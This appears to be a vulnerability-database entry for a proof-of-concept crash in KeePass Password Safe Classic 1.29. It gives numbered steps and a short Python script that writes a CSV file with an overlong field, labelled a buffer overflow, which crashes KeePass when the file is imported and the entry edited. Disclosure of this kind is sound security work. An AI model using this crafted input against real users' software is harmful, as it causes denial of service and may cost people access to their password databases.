KeePass Password Safe Classic 1.29 - Crash

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

1 . run python code : python crash.py 2 . open “KeePass” 3 . File —> New (Create New Password Database) 4 . File —> Import —> CSV File… 5 . open r3z4.csv 6 . Right Click on “R3Z4” username and edit 7 . Crashed ``` crash.py: #!/usr/bin/env python hdr = '"' #start syntax hcr = "R3Z4" #user oth = ',"' #user oth2 = '","",""' #user val=',' crash = "\x41"*199289 #B0F exp = hdr+hcr+hdr+val+hdr+hcr+hdr+oth+crash+oth2 file = open("r3z4.csv", "w") file.write(exp) file.close() ```

0%
暂无可用Exp或PoC
当前有0条受影响产品信息